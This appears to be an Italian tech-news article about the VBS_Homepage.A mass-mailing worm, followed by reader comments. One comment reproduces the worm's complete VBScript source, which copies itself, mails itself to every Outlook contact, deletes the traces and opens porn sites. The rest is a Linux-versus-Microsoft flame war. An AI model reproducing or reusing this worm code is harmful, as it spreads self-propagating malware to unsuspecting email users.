Homepage.A, nuovo virus ad attacco rapido

Da Trend Micro ieri pomeriggio arriva l'allarme al massimo livello: il nuovo worm si diffonde rapidamente ed è classificato ad alto rischio. Intasa la rete di email infette e apre siti pornografici. Problemi solo per gli utenti Windows

Homepage.A, nuovo virus ad attacco rapidoRoma - L'allarme è scattato ieri pomeriggio quando da Trend Micro è arrivato un annuncio ufficiale relativo ad una nuova "epidemia" da virus. Il colpevole è VBS_Homepage.A, worm che gli esperti dell'azienda antivirus classificano come ad alto rischio.

Trend Micro, società specializzata nella sicurezza antivirus, ha rilevato una rapida diffusione per il virus nonostante che le modalità utilizzate per la sua moltiplicazione sono quelle più note. Segnalazioni di infezione giungono all'azienda da tutto il mondo.

Il worm attacca i sistemi Windows arrivando come allegato di una email infetta. L'utente Windows che apra il file allegato viene colpito dal virus che, una volta dentro il sistema, sfrutta Outlook o Outlook Express per inviare l'email infetta a tutti i destinatari presenti in rubrica senza che l'utente se ne possa accorgere facilmente.
Modalità tipiche di diffusione, dunque, che non sembrano però fermare la velocità di moltiplicazione del worm realizzato in Visual Basic script con un tool di creazione virus già molto noto, "Worm Generator", di cui si è lungamente parlato e che da tempo circola online.
76 Commenti alla Notizia Homepage.A, nuovo virus ad attacco rapido
Ordina
  • Per curiosita', il sorgente del virus(ino) ^_^


    On Error Resume Next
    Set WS = CreateObject("WScript.Shell")
    Set FSO= Createobject("scripting.filesystemobject")
    Folder=FSO.GetSpecialFolder(2)

    Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
    Do While InF.AtEndOfStream<>True
    ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
    Loop

    Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
    OutF.write ScriptBuffer
    OutF.close
    Set FSO=Nothing

    If WS.regread ("HKCU\software\An\mailed") <> "1" then
    Mailit()
    End If

    Set s=CreateObject("Outlook.Application")
    Set t=s.GetNameSpace("MAPI")
    Set u=t.GetDefaultFolder(6)
    For i=1 to u.items.count
    If u.Items.Item(i).subject="Homepage" Then
    u.Items.Item(i).close
    u.Items.Item(i).delete
    End If
    Next
    Set u=t.GetDefaultFolder(3)
    For i=1 to u.items.count
    If u.Items.Item(i).subject="Homepage" Then
    u.Items.Item(i).delete
    End If
    Next

    Randomize
    r=Int((4*Rnd)+1)
    If r=1 then
    WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
    elseif r=2 Then
    WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
    elseif r=3 Then
    WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
    ElseIf r=4 Then
    WS.Run("http://sheila.issexy.tv/1.htm")
    End If

    Function Mailit()
    On Error Resume Next
    Set Outlook = CreateObject("Outlook.Application")
    If Outlook = "Outlook" Then
        Set Mapi=Outlook.GetNameSpace("MAPI")
        Set Lists=Mapi.AddressLists
        For Each ListIndex In Lists
            If ListIndex.AddressEntries.Count <> 0 Then
                ContactCount = ListIndex.AddressEntries.Count
                For Count= 1 To ContactCount
                    Set Mail = Outlook.CreateItem(0)
                    Set Contact = ListIndex.AddressEntries(Count)
                    Mail.To = Contact.Address
                    Mail.Subject = "Homepage"
                    Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
                    Set Attachment=Mail.Attachments
                    Attachment.Add Folder & "\homepage.HTML.vbs"
                    Mail.DeleteAfterSubmit = True
                    If Mail.To <> "" Then
                    Mail.Send
                    WS.regwrite "HKCU\software\An\mailed", "1"
                End If
                Next
            End If
        Next
    End if
    End Function
    non+autenticato
  • Alien,

    ma possibile che per qualsiasi cosa che venga discussa nei 10.000 forum che segui (perché sei ovunque), tu non sappia far altro che tirare fuori quelle ca##ate sui pretoriani, "urlando" come un invasato?
    Non sai proprio intervenire in un modo più normale, tralasciando per un attimo la tua crociata assurda?
    Possibile che tu non abbia, ogni tanto, una semplice, umile, opinione da sottoporre agli altri?
    Possibile che per te siamo tutti una massa di imbecilli?

    Guarda che se mi vuoi infamare e vuoi chiamare pretoriano anche me, ti sbagli di grosso.
    Uso Linux dalla versione 3.0.3 di Red Hat che aveva un kernel 1.2.13, quando cioè installare una scheda di rete era una discreta impresa. Ho tradotto un bel po' di documentazione per ILDP e lo faccio ancora. Ho lavorato alla revisione di Grub con Eduardo Nahum Ochs e Okuji Yoshimori. Lavoro come programmatore (faccio siti internet e-commerce in Linux con PHP) e installo e configuro firewall Linux/Unix.
    Quindi, non sono né un ragazzino con la fissa di Linux, né tantomeno un pretoriano.

    Nonostante questo, uso anche win2k e NT, perché quando trovi un cliente che usa queste piattaforme, se vuoi portare a casa la pagnotta, ti devi districare anche con questa roba.
    Per mia modestissima esperienza, ti posso dire che win2k server con l'Active Directory e l'autenticazione Kerberos attivate, ha fatto un notevole passo avanti per quanto riguarda la sicurezza. Il protocollo Kerberos esisteva già per Unix, quindi è solo una implementazione MS, ciò nonostante è molto valido, visto che supporta la delega anche a livello applicazioni e autentica anche il server.
    Non so se hai mai provato a bucare un server del genere, configurato bene e dietro uno o più firewall, partendo da zero (senza Social Engineering) come farebbe un hacker (hacker, non cracker!) dall'altra parte del mondo. Beh!, io lo faccio spesso per testare il mio lavoro e ti assicuro che non è cosa da script kiddies. Che poi sia sempre possibile usare un exploit fresco di giornata e che si trovino amministratori non tanto solerti, è tutto vero. Ma, non tutti gli amministratori devono difendere Fort Knox. Quindi, un certo "lassismo" è abbastanza comprensibile. Anche perché un amministratore che non lavori solo e soltanto sulla sicurezza, ha da seguire anche una miriade di altre cacchiate nel tran-tran giornaliero (tipo la stampante che non stampa o il database che va in crash).
    Quel che voglio dire è che non tutto quello che viene da Bill è merda, e tutto quello che viene da Linus è oro colato.
    In quanto a stabilità, con server del genere, ti assicuro che le schermate blu si sono veramente ridotte all'osso. Anche su configurazioni con un discreto carico di lavoro.
    Linux/Unix resta, a mia opinione, migliore in generale come architettura, ma nel particolare e nell'uso quotidiano queste differenze sono relative.

    Quindi cerca di non essere così manicheista e cerca di essere più modesto. Io, sono sempre ben disposto a scambiare opinioni e spesso imparo anche nuove cose.
    Un po' di umiltà non guasta mai.

    Ciao e scusa per il sermone, ma forse stai esagerando.
    non+autenticato


  • - Scritto da: bera
    > Alien,
    >
    > ma possibile che per qualsiasi cosa che
    > venga discussa nei 10.000 forum che segui
    > (perché sei ovunque), tu non sappia far
    > altro che tirare fuori quelle ca##ate sui
    > pretoriani, "urlando" come un invasato?
    > Non sai proprio intervenire in un modo più
    > normale, tralasciando per un attimo la tua
    > crociata assurda?
    > Possibile che tu non abbia, ogni tanto, una
    > semplice, umile, opinione da sottoporre agli
    > altri?
    > Possibile che per te siamo tutti una massa
    > di imbecilli?

    Partiamo dagli "IMBECILLI". Devo dire che sono dell' opinione che sono la maggior parte degli UMANI, CHE DEFINISCO "La gran Massa"......che definisco anche "MATRIX".
    Ma, per fortuna, non lo sono tutti, non faccio mai di ogni erba un fascio, e, come detto in altre occasioni, sono sempre e comunque i pochi che nel BENE o nel MALE fanno la storia dell' umanità e che portano avanti la baracca facendo sopportare "La Gran Massa".
    La definizione di "PRETORIANO DI REDMOND", ovviamente non è diretta a tutti indiscriminatamente, nemmeno a coloro che usano esclusivamente i SO del DRAGASACCOCCE di REDMOND; perdonami se lo chiamo DRAGASACCOCCE DI REDMOND, perchè, a prescindere della bontà o meno dei suoi SO/SW, quello lì è e resterà comunque un DERAGASACCOCCE che ha facocitato i SO/SW del pianeta TERRA.
    Un pò come ha fatto il mio "amico" BERLUSCA con la Lega; gli ha suonato il piffero per attirarlo a se e ha condotto il BOSSI e la sua banda ad affogare nello stagno, ma questo è altro discorso, anche se calza per il DRAGA di REDMOND.



    >
    > Guarda che se mi vuoi infamare e vuoi
    > chiamare pretoriano anche me, ti sbagli di
    > grosso.

    No, mica lo sei tu.

    > Uso Linux dalla versione 3.0.3 di Red Hat
    > che aveva un kernel 1.2.13, quando cioè
    > installare una scheda di rete era una
    > discreta impresa. Ho tradotto un bel po' di
    > documentazione per ILDP e lo faccio ancora.
    > Ho lavorato alla revisione di Grub con
    > Eduardo Nahum Ochs e Okuji Yoshimori. Lavoro
    > come programmatore (faccio siti internet
    > e-commerce in Linux con PHP) e installo e
    > configuro firewall Linux/Unix.
    > Quindi, non sono né un ragazzino con la
    > fissa di Linux, né tantomeno un pretoriano.

    Guarda che ho scoperto LINUX da poco perchè mi ero rotto non tanto dei SO del DRAGA, ma della sua prepotenza, anche nei suoi contratti di licenza, e della sua vogli di CONTROLLO GLOBALE DEI SO.
    Tutt'ora, TURANDOMI IL NASO, uso ancora i SO del DRAGA, perchè nel mio lavoro, per alcuni SW, non riesco a sostituirlo completamente, conto di farlo presto confidando nella crescita esponenziale di LINUX e della sua tecnologia, conto anche nella conseguente crescita di SW che rilasceranno SW per LINUX.

    >
    > Nonostante questo, uso anche win2k e NT,
    > perché quando trovi un cliente che usa
    > queste piattaforme, se vuoi portare a casa
    > la pagnotta, ti devi districare anche con
    > questa roba.

    Per forza, ma fagli presente che è possibile rivolgersi ad altri senza farsi dragare le saccocce o minacciare, sì "MINACCIARE", perchè il DRAGA ora è passato alle minacce. (leggi SIAE/BSA/BSE).

    > Per mia modestissima esperienza, ti posso
    > dire che win2k server con l'Active Directory
    > e l'autenticazione Kerberos attivate, ha
    > fatto un notevole passo avanti per quanto
    > riguarda la sicurezza. Il protocollo
    > Kerberos esisteva già per Unix, quindi è
    > solo una implementazione MS, ciò nonostante
    > è molto valido, visto che supporta la delega
    > anche a livello applicazioni e autentica
    > anche il server.

    Può anche essere, mica ho detto che è tutto "merda" quello che da; dico altro, anche.


    > Non so se hai mai provato a bucare un server
    > del genere, configurato bene e dietro uno o
    > più firewall, partendo da zero (senza Social
    > Engineering) come farebbe un hacker (hacker,
    > non cracker!) dall'altra parte del mondo.
    > Beh!, io lo faccio spesso per testare il mio
    > lavoro e ti assicuro che non è cosa da
    > script kiddies. Che poi sia sempre possibile
    > usare un exploit fresco di giornata e che si
    > trovino amministratori non tanto solerti, è
    > tutto vero. Ma, non tutti gli amministratori
    > devono difendere Fort Knox.

    Mah, personalmente ritengo che ogno computer connesso in INTERNET oggi, e di più domani, dovrà essere ben protetto dagli attacchi, se poi usa SO WIN, APRITI CIELO, gli arriva di tutto.
    Poi, il GRADO DI PROTEZIONE, si deve adeguare comunque a quello cui è preposto il SERVER.
    Mi risulta che ci sono SERVER di attacco AUTOMATICI, quindi senza operatore, che cercano continaumente nella rete computers da penetrare, se trovano qualche porta aperta, entrano e ci lasciano il ricordino in attesa di sviluppi successivi( Mi pare Trinoo SERVERS di attacco).


    Quindi, un certo
    > "lassismo" è abbastanza comprensibile. Anche
    > perché un amministratore che non lavori solo
    > e soltanto sulla sicurezza, ha da seguire
    > anche una miriade di altre cacchiate nel
    > tran-tran giornaliero (tipo la stampante che
    > non stampa o il database che va in crash).

    Beh, fa parte del suo lavoro, ma PRIORITARIA, secondo me, è la sicurezza, se lasci buchi aperti, puoi essere FOTTUTO in breve tempo se sei in RETE.

    > Quel che voglio dire è che non tutto quello
    > che viene da Bill è merda, e tutto quello
    > che viene da Linus è oro colato.

    Sono d' accordissimo su questo, ma è pià una questione di FILOSOFIA, quindi di mentalità degli umani.

    > In quanto a stabilità, con server del
    > genere, ti assicuro che le schermate blu si
    > sono veramente ridotte all'osso. Anche su
    > configurazioni con un discreto carico di
    > lavoro.

    Continuerò a chiamare la Microsoft come ditta del DRAGASACCOCCE DI REDMOND, fino a che non renderà disponibili i codici dei suoi SO/SW e ne modificherà contratti e licenze per gli utilizzatori.


    > Linux/Unix resta, a mia opinione, migliore
    > in generale come architettura, ma nel
    > particolare e nell'uso quotidiano queste
    > differenze sono relative.

    Penso che in meno di 2 anni LINUX portà sostutuire in tutto e per tutto i sistemi WIN, e questo grazie alla maggior maturità informatica degli umani e grazie alle continue migliorie di LINUX che attrirerà anche SO commerciali.


    > Quindi cerca di non essere così manicheista
    > e cerca di essere più modesto. Io, sono
    > sempre ben disposto a scambiare opinioni e
    > spesso imparo anche nuove cose.
    > Un po' di umiltà non guasta mai.

    D' accordo.

    > Ciao e scusa per il sermone, ma forse stai
    > esagerando.

    Ciao
    non+autenticato
  • Ciao Alien,

    sono contento che tu mi abbia risposto. Dimostri di non essere un provocatore senza consistenza.
    Tanto per cominciare, voglio chiarire subito che ho scritto questo messaggio proprio per attirarti/provocarti, ma nel 99% dei casi sono daccordo con i tuoi interventi (su tutti i forum dove ti trovo) e quindi sono dalla tua parte.
    Inoltre, ritengo che tu abbia veramente qualcosa da dire di solito, anche se lo fai a modo tuo e con toni spinti. E sono anche dei tuoi stessi sentimenti, sia per quanto riguarda la MS che per la politica (ma questo, come hai detto tu, è un altro discorso).

    > Partiamo dagli "IMBECILLI". Devo dire che
    > sono dell' opinione che sono la maggior
    > parte degli UMANI, CHE DEFINISCO "La gran
    > Massa"......che definisco anche "MATRIX".
    > Ma, per fortuna, non lo sono tutti, non
    > faccio mai di ogni erba un fascio, e, come
    > detto in altre occasioni, sono sempre e
    > comunque i pochi che nel BENE o nel MALE
    > fanno la storia dell' umanità e che portano
    > avanti la baracca facendo sopportare "La
    > Gran Massa".

    Vero. Ma non tutti possono essere qualcosa di speciale. Me compreso.

    > La definizione di "PRETORIANO DI REDMOND",
    > ovviamente non è diretta a tutti
    > indiscriminatamente, nemmeno a coloro che
    > usano esclusivamente i SO del DRAGASACCOCCE
    > di REDMOND; perdonami se lo chiamo
    > DRAGASACCOCCE DI REDMOND, perchè, a
    > prescindere della bontà o meno dei suoi
    > SO/SW, quello lì è e resterà comunque un
    > DERAGASACCOCCE che ha facocitato i SO/SW del
    > pianeta TERRA.

    Sono daccordo. La politica di Bill è troppo troppo troppo aggressiva.

    > Un pò come ha fatto il mio "amico" BERLUSCA
    > con la Lega; gli ha suonato il piffero per
    > attirarlo a se e ha condotto il BOSSI e la
    > sua banda ad affogare nello stagno, ma
    > questo è altro discorso, anche se calza per
    > il DRAGA di REDMOND.
    >

    Lasciamo perdere, per pietà.

    > > Guarda che se mi vuoi infamare e vuoi
    > > chiamare pretoriano anche me, ti sbagli di
    > > grosso.
    >
    > No, mica lo sei tu.

    Thanks for that! Sorride

    > > discreta impresa. Ho tradotto un bel po'
    > di
    > > documentazione per ILDP e lo faccio
    > ancora.
    > > Ho lavorato alla revisione di Grub con
    > > Eduardo Nahum Ochs e Okuji Yoshimori.

    E l'ho fatto e lo faccio gratis e volentieri.
    La filosofia Open Source permette, non fosse altro, di intavolare queste discussioni in forum come questo e su altri mille del genere. Qualcosa l'ha cambiato sicuramente: l'aprire gli occhi a chi pensa che non ci siano strade alternative.
    E' da molto tempo che seguo la filosofia di Richard Stallman, ho anche avuto della corrispondenza con lui per un breve periodo (non è irraggiungibile e non si sente quel mostro sacro che è). Mi ha spiegato lui stesso quello che faceva al MIT (con toni molto molto pacati) ai tempi dell'Emacs, quando riteneva una bestemmia il fatto che il software dovesse avere una proprietà e riscriveva completamente di notte in Lisp il codice dei prodotti della Symbolics che vedeva come tu ora vedi il "Dragasaccocce di Redmond". Alla Symbolics dicevano che doveva avere chi lo aiutava, qualcuno che faceva il doppio gioco, perché non era umanamente possibile che uno da solo potesse fare quello che faceva Stallman. Beh! Lo faceva da solo.
    Questo succedeva nell'83, quando io pestavo i tasti di un C-64 e non sapevo neanche che esistessero cose del genere.

    > Tutt'ora, TURANDOMI IL NASO, uso ancora i SO
    > del DRAGA, perchè nel mio lavoro, per alcuni
    > SW, non riesco a sostituirlo completamente,
    > conto di farlo presto confidando nella
    > crescita esponenziale di LINUX e della sua
    > tecnologia, conto anche nella conseguente
    > crescita di SW che rilasceranno SW per
    > LINUX.

    Guarda che se cerchi bene è molto difficile che non ci sia qualcosa di analogo o migliore in Unix.
    Spesso è sparpagliato in una miriade di piccole applicazioni dedicate e molto più efficienti.
    Inoltre, considera che chi programma per Unix deve tenere conto delle differenze di piattaforma e dei dialetti di Unix stesso. Lo stesso programma deve essere compilabile su macchine anche diverse a livello hardware.
    Fare un programma tutto-in-uno di grandi dimensioni, tenendo in considerazione librerie e compilatori diversi, non è uno scherzo.
    Non tutti i programmi che vengono scritti per Unix tengono conto di questo, ma se tu dovessi scrivere un programma che vuoi che divenga un riferimento del mercato, devi per forza tenere in considerazione cose del genere.
    In un certo senso, avere un'unica piattaforma SW/HW come nel caso di Windows, semplifica notevolmente le cose. Con COM e COM+ come base e Win32 come subsystem, una volta imparato ad usarlo, fai funzionare il tutto per qualsiasi variante di Windows. Questo non è poco.

    E'secondo me più un fatto di abitudine ed esperienze fatte su un dato tipo di prodotti che ci lega alla piattaforma Windows.
    Abbiamo imparato a sfruttare quella piattaforma, ma se non fosse esistita, avremmo imparato a farlo in Unix o in un altro SO.
    Questo è un po' quello che ci frega. Il fatto di essere di una generazione informatica formatasi con il mondo Windows disponibile.
    Alcune soluzioni MS sono effettivamente ottime e facili da usare e sarebbe stato molto bello se fossero state sviluppate su piattaforme libere e gratuite, ma tant'è. Alcuni dicono, giustamente, che non si mette in piedi una Micosoft senza guadagni ed è vero e forse, aggiungo io, non è stato poi così male, perché il confronto è sempre produttivo.
    Quello che non è produttivo, secondo me, è il pretendere che le cose non si evolvano perché devono sottostare a leggi di mercato.
    E non mi si venga a dire che Unix è valido solo in ambito accademico, dove chi lo apprende ha le spalle coperte dallo stipendio che prende a fine mese. La conoscenza è l'unico vero potere e trasformare la conoscenza in reddito è abbastanza semplice. Se io mi sono formato in una università ed ho acquisito una conoscenza, posso sempre vendere i miei servizi a chi quella conoscenza non ha. Questo vale per tutti, anche per me, che devo pagare l'idraulico, che ha studiato meno di me, ma sa riparare il rubinetto che io non so riparare. Quando chiamo l'idraulico pago di fatto la sua competenza.

    > Per forza, ma fagli presente che è possibile
    > rivolgersi ad altri senza farsi dragare le
    > saccocce o minacciare, sì "MINACCIARE",
    > perchè il DRAGA ora è passato alle minacce.
    > (leggi SIAE/BSA/BSE).

    Non è così facile. Quando un'azienda comincia a informatizzarsi con l'acquisto di un PC che monta Windows 9x e poi in seguito, se le cose girano, passa a NT o win2k, ed ha nel frattempo formato il personale su quella piattaforma, è molto difficile che non voglia continuare su quella strada che già conosce. Per un'azienda, se cambiano le esigenze ed è necessario spendere per un livello superiore di software, quelle spese diventano investimenti, né più né meno dell'acquisto del furgone più grande per
    non+autenticato


  • - Scritto da: bera
    > Ciao Alien,
    >
    > sono contento che tu mi abbia risposto.
    > Dimostri di non essere un provocatore senza
    > consistenza.
    > Tanto per cominciare, voglio chiarire subito
    > che ho scritto questo messaggio proprio per
    > attirarti/provocarti, ma nel 99% dei casi
    > sono daccordo con i tuoi interventi (su
    > tutti i forum dove ti trovo) e quindi sono
    > dalla tua parte.
    > Inoltre, ritengo che tu abbia veramente
    > qualcosa da dire di solito, anche se lo fai
    > a modo tuo e con toni spinti. E sono anche
    > dei tuoi stessi sentimenti, sia per quanto
    > riguarda la MS che per la politica (ma
    > questo, come hai detto tu, è un altro
    > discorso).
    >
    > > Partiamo dagli "IMBECILLI". Devo dire che
    > > sono dell' opinione che sono la maggior
    > > parte degli UMANI, CHE DEFINISCO "La gran
    > > Massa"......che definisco anche "MATRIX".
    > > Ma, per fortuna, non lo sono tutti, non
    > > faccio mai di ogni erba un fascio, e, come
    > > detto in altre occasioni, sono sempre e
    > > comunque i pochi che nel BENE o nel MALE
    > > fanno la storia dell' umanità e che
    > portano
    > > avanti la baracca facendo sopportare "La
    > > Gran Massa".
    >
    > Vero. Ma non tutti possono essere qualcosa
    > di speciale. Me compreso.
    >
    > > La definizione di "PRETORIANO DI REDMOND",
    > > ovviamente non è diretta a tutti
    > > indiscriminatamente, nemmeno a coloro che
    > > usano esclusivamente i SO del
    > DRAGASACCOCCE
    > > di REDMOND; perdonami se lo chiamo
    > > DRAGASACCOCCE DI REDMOND, perchè, a
    > > prescindere della bontà o meno dei suoi
    > > SO/SW, quello lì è e resterà comunque un
    > > DERAGASACCOCCE che ha facocitato i SO/SW
    > del
    > > pianeta TERRA.
    >
    > Sono daccordo. La politica di Bill è troppo
    > troppo troppo aggressiva.
    >
    > > Un pò come ha fatto il mio "amico"
    > BERLUSCA
    > > con la Lega; gli ha suonato il piffero per
    > > attirarlo a se e ha condotto il BOSSI e la
    > > sua banda ad affogare nello stagno, ma
    > > questo è altro discorso, anche se calza
    > per
    > > il DRAGA di REDMOND.
    > >
    >
    > Lasciamo perdere, per pietà.
    >
    > > > Guarda che se mi vuoi infamare e vuoi
    > > > chiamare pretoriano anche me, ti
    > sbagli di
    > > > grosso.
    > >
    > > No, mica lo sei tu.
    >
    > Thanks for that! Sorride
    >
    > > > discreta impresa. Ho tradotto un bel
    > po'
    > > di
    > > > documentazione per ILDP e lo faccio
    > > ancora.
    > > > Ho lavorato alla revisione di Grub con
    > > > Eduardo Nahum Ochs e Okuji Yoshimori.
    >
    > E l'ho fatto e lo faccio gratis e volentieri.
    > La filosofia Open Source permette, non fosse
    > altro, di intavolare queste discussioni in
    > forum come questo e su altri mille del
    > genere. Qualcosa l'ha cambiato sicuramente:
    > l'aprire gli occhi a chi pensa che non ci
    > siano strade alternative.
    > E' da molto tempo che seguo la filosofia di
    > Richard Stallman, ho anche avuto della
    > corrispondenza con lui per un breve periodo
    > (non è irraggiungibile e non si sente quel
    > mostro sacro che è). Mi ha spiegato lui
    > stesso quello che faceva al MIT (con toni
    > molto molto pacati) ai tempi dell'Emacs,
    > quando riteneva una bestemmia il fatto che
    > il software dovesse avere una proprietà e
    > riscriveva completamente di notte in Lisp il
    > codice dei prodotti della Symbolics che
    > vedeva come tu ora vedi il "Dragasaccocce di
    > Redmond". Alla Symbolics dicevano che doveva
    > avere chi lo aiutava, qualcuno che faceva il
    > doppio gioco, perché non era umanamente
    > possibile che uno da solo potesse fare
    > quello che faceva Stallman. Beh! Lo faceva
    > da solo.
    > Questo succedeva nell'83, quando io pestavo
    > i tasti di un C-64 e non sapevo neanche che
    > esistessero cose del genere.
    >
    > > Tutt'ora, TURANDOMI IL NASO, uso ancora i
    > SO
    > > del DRAGA, perchè nel mio lavoro, per
    > alcuni
    > > SW, non riesco a sostituirlo
    > completamente,
    > > conto di farlo presto confidando nella
    > > crescita esponenziale di LINUX e della sua
    > > tecnologia, conto anche nella conseguente
    > > crescita di SW che rilasceranno SW per
    > > LINUX.
    >
    > Guarda che se cerchi bene è molto difficile
    > che non ci sia qualcosa di analogo o
    > migliore in Unix.
    > Spesso è sparpagliato in una miriade di
    > piccole applicazioni dedicate e molto più
    > efficienti.
    > Inoltre, considera che chi programma per
    > Unix deve tenere conto delle differenze di
    > piattaforma e dei dialetti di Unix stesso.
    > Lo stesso programma deve essere compilabile
    > su macchine anche diverse a livello
    > hardware.
    > Fare un programma tutto-in-uno di grandi
    > dimensioni, tenendo in considerazione
    > librerie e compilatori diversi, non è uno
    > scherzo.
    > Non tutti i programmi che vengono scritti
    > per Unix tengono conto di questo, ma se tu
    > dovessi scrivere un programma che vuoi che
    > divenga un riferimento del mercato, devi per
    > forza tenere in considerazione cose del
    > genere.
    > In un certo senso, avere un'unica
    > piattaforma SW/HW come nel caso di Windows,
    > semplifica notevolmente le cose. Con COM e
    > COM+ come base e Win32 come subsystem, una
    > volta imparato ad usarlo, fai funzionare il
    > tutto per qualsiasi variante di Windows.
    > Questo non è poco.
    >
    > E'secondo me più un fatto di abitudine ed
    > esperienze fatte su un dato tipo di prodotti
    > che ci lega alla piattaforma Windows.
    > Abbiamo imparato a sfruttare quella
    > piattaforma, ma se non fosse esistita,
    > avremmo imparato a farlo in Unix o in un
    > altro SO.
    > Questo è un po' quello che ci frega. Il
    > fatto di essere di una generazione
    > informatica formatasi con il mondo Windows
    > disponibile.
    > Alcune soluzioni MS sono effettivamente
    > ottime e facili da usare e sarebbe stato
    > molto bello se fossero state sviluppate su
    > piattaforme libere e gratuite, ma tant'è.
    > Alcuni dicono, giustamente, che non si mette
    > in piedi una Micosoft senza guadagni ed è
    > vero e forse, aggiungo io, non è stato poi
    > così male, perché il confronto è sempre
    > produttivo.
    > Quello che non è produttivo, secondo me, è
    > il pretendere che le cose non si evolvano
    > perché devono sottostare a leggi di mercato.
    > E non mi si venga a dire che Unix è valido
    > solo in ambito accademico, dove chi lo
    > apprende ha le spalle coperte dallo
    > stipendio che prende a fine mese. La
    > conoscenza è l'unico vero potere e
    > trasformare la conoscenza in reddito è
    > abbastanza semplice. Se io mi sono formato
    > in una università ed ho acquisito una
    > conoscenza, posso sempre vendere i miei
    > servizi a chi quella conoscenza non ha.
    > Questo vale per tutti, anche per me, che
    > devo pagare l'idraulico, che ha studiato
    > meno di me, ma sa riparare il rubinetto che
    > io non so riparare. Quando chiamo
    > l'idraulico pago di fatto la sua competenza.
    >
    > > Per forza, ma f
    non+autenticato
  • > Speriamo. Me lo auguro anch'io.
    > Ricordati però che sono sempre esistiti i
    > conformisti.
    >
    > ciao
    >

    concordo con il pensiero di Alien, magari un po' meno col modo di esprimerlo, concordo con le osservazioni da te fatte. pero' sta storia ha rotto un po'. lasciamo che il mercato, le scelte economiche, quelle politiche, la storia abbia il suo corso. un'ultima osservazione: arredare un appartamento, fare una vacanza in maniera anticonformista, sicuramente. mandare avanti un'azienda, hummmmmm...
    non+autenticato


  • - Scritto da: ale
    > > Speriamo. Me lo auguro anch'io.
    > > Ricordati però che sono sempre esistiti i
    > > conformisti.
    > >
    > > ciao
    > >
    >
    > concordo con il pensiero di Alien, magari un
    > po' meno col modo di esprimerlo, concordo
    > con le osservazioni da te fatte. pero' sta
    > storia ha rotto un po'. lasciamo che il
    > mercato, le scelte economiche, quelle
    > politiche, la storia abbia il suo corso.
    > un'ultima osservazione: arredare un
    > appartamento, fare una vacanza in maniera
    > anticonformista, sicuramente. mandare avanti
    > un'azienda, hummmmmm...

    L' importante è avere il coraggio di CAMBIARE, mica sta scritto da nessuna parte che per mandare avanti un' AZIENDA si debba per foza essere degli SQUALI per annientare la concorrenza e CONQUISTARE il MERCATO, per far vedere che si ha "LE PALLE".

    C'è chi lo fa, ma lo può fare solo ed esclusivamente perchè trova un HUMUS che glielo lascia fare.
    Non odio le MULTINAZIONALI tout court, ma ODIO LE MULTINAZIONALI sul tipo di quelle FARMACEUTICHE che hanno avuto a che fare col Governo del SUDAFRICA, dietro quelle MILTINAZIONALI, ci sono ORRENDI UMANOIDI che tramano e pianificano le peggiori nefandezze che ricadono sulla gente. E tutto per le loro SACCOCCE. Gli umanoidi che gestiscono le leve di comando di questo tipo di aziende e ne pianificano e comandano le strategie, hanno il cervello morfologicamente predisposto al NAZISMO.
    Se poi dico che sono pure bruti e pelate, non sbaglio.
    Non dico di quelli cje portano il Rolex al POLSINO, questi mi fanno solo sorridere esaminandoli bene, dico quelli bacati dentro, quelli che al mattino fanno fatica a farsi la barba, se non faticano ancora adesso, ben presto un mattino o l' altro, se ne accorgeranno, quando vedranno riflesso nello specchi dentro cosa hanno.
    Chi semina vento, prima o poi raccoglierà tempesta, il fatto è che temporaneamente se la passano bene, ma si vive solo di cose materiali?
    Chiedetevi questo ogni tanto PRETORIANI.


    non+autenticato
  • il coraggio di cambiare. e magari diventare un martire? ma de che, Alien?!! bye


    - Scritto da: Alien
    >
    >
    > - Scritto da: ale
    > > > Speriamo. Me lo auguro anch'io.
    > > > Ricordati però che sono sempre
    > esistiti i
    > > > conformisti.
    > > >
    > > > ciao
    > > >
    > >
    > > concordo con il pensiero di Alien, magari
    > un
    > > po' meno col modo di esprimerlo, concordo
    > > con le osservazioni da te fatte. pero' sta
    > > storia ha rotto un po'. lasciamo che il
    > > mercato, le scelte economiche, quelle
    > > politiche, la storia abbia il suo corso.
    > > un'ultima osservazione: arredare un
    > > appartamento, fare una vacanza in maniera
    > > anticonformista, sicuramente. mandare
    > avanti
    > > un'azienda, hummmmmm...
    >
    > L' importante è avere il coraggio di
    > CAMBIARE, mica sta scritto da nessuna parte
    > che per mandare avanti un' AZIENDA si debba
    > per foza essere degli SQUALI per annientare
    > la concorrenza e CONQUISTARE il MERCATO, per
    > far vedere che si ha "LE PALLE".
    >
    > C'è chi lo fa, ma lo può fare solo ed
    > esclusivamente perchè trova un HUMUS che
    > glielo lascia fare.
    > Non odio le MULTINAZIONALI tout court, ma
    > ODIO LE MULTINAZIONALI sul tipo di quelle
    > FARMACEUTICHE che hanno avuto a che fare col
    > Governo del SUDAFRICA, dietro quelle
    > MILTINAZIONALI, ci sono ORRENDI UMANOIDI che
    > tramano e pianificano le peggiori nefandezze
    > che ricadono sulla gente. E tutto per le
    > loro SACCOCCE. Gli umanoidi che gestiscono
    > le leve di comando di questo tipo di aziende
    > e ne pianificano e comandano le strategie,
    > hanno il cervello morfologicamente
    > predisposto al NAZISMO.
    > Se poi dico che sono pure bruti e pelate,
    > non sbaglio.
    > Non dico di quelli cje portano il Rolex al
    > POLSINO, questi mi fanno solo sorridere
    > esaminandoli bene, dico quelli bacati
    > dentro, quelli che al mattino fanno fatica a
    > farsi la barba, se non faticano ancora
    > adesso, ben presto un mattino o l' altro, se
    > ne accorgeranno, quando vedranno riflesso
    > nello specchi dentro cosa hanno.
    > Chi semina vento, prima o poi raccoglierà
    > tempesta, il fatto è che temporaneamente se
    > la passano bene, ma si vive solo di cose
    > materiali?
    > Chiedetevi questo ogni tanto PRETORIANI.
    >
    >
    non+autenticato
  • ...perchè di gran lunga più distruttivo. Nella settimana scorsa mi sono arrivati ben 4 messaggi infetti con questo virus, che tenta di infettare qualsiasi .exe che trova sul sistema... L'unico modo per sbarazzarsene è la reinstallazione dei Windows e di tutte le applicazioni...

    Gente, per favore, riflettete prima di cliccare!

    FD
    non+autenticato
  • Stasera mi sono mangiato crostini e pasta al forno........
    non+autenticato
